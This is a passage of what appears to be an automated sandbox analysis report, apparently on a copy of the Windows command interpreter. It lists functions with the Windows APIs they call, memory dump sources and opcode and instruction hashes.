                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: ErrorMode$FullNamePathwcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1464828906-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 5c0fd1969c73b4d39aa4be34888137298cba3c6158d7376fdb3c4dea73e1fa2a
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6031D122A0875286E724AF19AC2407FF661FF45BA4FD59235DA5A433D0EF7DE84A8310
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC5AD8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBCD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF706EBB9A1,?,?,?,?,00007FF706EBD81A), ref: 00007FF706EBCDA6
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBCD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF706EBB9A1,?,?,?,?,00007FF706EBD81A), ref: 00007FF706EBCDBD
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleTitleW.KERNELBASE ref: 00007FF706EC5B52
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC4224: InitializeProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF706EC4297
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC4224: UpdateProcThreadAttribute.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF706EC42D7
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC4224: memset.MSVCRT ref: 00007FF706EC42FD
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC4224: memset.MSVCRT ref: 00007FF706EC4368
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC4224: GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF706EC4380
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC4224: wcsrchr.MSVCRT ref: 00007FF706EC43E6
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC4224: lstrcmpW.KERNELBASE ref: 00007FF706EC4401
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0 ref: 00007FF706EC5BC7
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memset$AttributeConsoleHeapProcThreadTitlewcsrchr$AllocInfoInitializeListProcessStartupUpdate_wcsnicmplstrcmpwcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: P<dwj`
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 497088868-4006019111
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 7ab6fa8dc0b51f14b91d73e5ffe10a57052e9477fd238aff7d214e1f01dcae97
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 7240a597e42ac0a3fff55f65867979d698f0b616acacebf19362c77b89168f3a
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7ab6fa8dc0b51f14b91d73e5ffe10a57052e9477fd238aff7d214e1f01dcae97
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 32318E20A0C74282EA24BB11ACA15BFE291BF89B90FD45531E94E87B95DF3CE5028720
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EBCA40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memset
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: onecore\base\cmd\maxpathawarestring.cpp
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2221118986-3416068913
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: d98343f8a50b510becc2b8cc51fbdae8f634d85e983456aeaa23f385d89a4afb
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3911C621B0874681EB50EB55AD642BB9290BF84FE4FA85331DE6E4B3D5DF2CD0814320
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC291C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: DriveType
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: :$P<dwj`
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 338552980-366488791
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 0229af3b55ddfa6c7d46076c83f391ef179af98164e2293fd611dac5491c73d4
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EFE0656661874186D720DB60E86106BF761FF8D358FC41525D98D87724DB3CD149CB18
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EBBE00 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 120COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memsetwcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: 2$COMSPEC
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1764819092-1738800741
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: b9ab5f7dc9e1de4fb73340b4936d8faa2c9ba4b21260c8514921b1ab44a1c5e6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: e81633c5c4db6ea7cfa6e4a12e7214ba1c518983bb75d6b0f66f55e4efe1fd6e
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b9ab5f7dc9e1de4fb73340b4936d8faa2c9ba4b21260c8514921b1ab44a1c5e6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6D51C021A0874A85FB70BB25AC3037FA291BF44B84FD86271DA4D462E5DF3CE84087A1
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC498C Relevance: 4.5, APIs: 3, Instructions: 33memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Heap$EnvironmentFreeProcessVariable
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2643372051-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 49892fdbdbb93a03844bd16286cde042899f8d20c3c19ceaef7f6d70d853aae3
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 2261ed067c1bd9d64c9916e02fbda67ef49cb5a19a04fca512b47334c3e2809f
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 49892fdbdbb93a03844bd16286cde042899f8d20c3c19ceaef7f6d70d853aae3
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C3F08672A19B46C6EB10AB65FD24076EAE1FF9D7A0BD59274C92E433D0DF3C94458210
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC5A68 Relevance: 4.5, APIs: 3, Instructions: 19COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: _get_osfhandle$ConsoleMode
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1591002910-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: cc4878986f4e42514252d7eb877981450ae5bf52a0b27ba4d12556fbaf1eff51
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: d9a2411661cc749df2cc8e2c9a942563fecc7e1ab22d7c9986d6bd2ce2846776
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cc4878986f4e42514252d7eb877981450ae5bf52a0b27ba4d12556fbaf1eff51
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 01F07439A09746CBE604AB10EC650BABBA0FF8A715FC5D175C90E47324DF3DA4058B60
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC3A0C Relevance: 3.0, APIs: 2, Instructions: 43COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • FindClose.KERNELBASE(?,?,?,00007FF706EDEAC5,?,?,?,00007FF706EDE925,?,?,?,?,00007FF706EBB9B1), ref: 00007FF706EC3A56
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CloseFind
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1863332320-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: bab5306cd567feeb86bb0befbcdd41048a3801cd437bd301f39ca3c6803b8cd3
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: e23539f844c4204e3caec65847c680a3022e9bcf985df9bf0eb428ac365c3559
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bab5306cd567feeb86bb0befbcdd41048a3801cd437bd301f39ca3c6803b8cd3
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E2019220E08B8396EA54A715AD6017BE7A0FFD8BA0BE0D530D50D83694DF2CE5A38710
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC9A6C Relevance: 3.0, APIs: 2, Instructions: 34COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Concurrency::cancel_current_taskmalloc
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1412018758-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 1cbc76b91adcbc50426ec0160b6c43d02b5c02c802198208a66957b4662997da
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: c3506a1d8debd3bbd36834f8c7fedff0ccd37dc3184a433ea20917ae1affb06f
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1cbc76b91adcbc50426ec0160b6c43d02b5c02c802198208a66957b4662997da
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E7E09201F0930B81FE183B626C7507A92547F58B60FD81430CD1D06383EF2CA1928730
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EBCD90 Relevance: 2.5, APIs: 2, Instructions: 30memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF706EBB9A1,?,?,?,?,00007FF706EBD81A), ref: 00007FF706EBCDA6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF706EBB9A1,?,?,?,?,00007FF706EBD81A), ref: 00007FF706EBCDBD
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmpDownload File
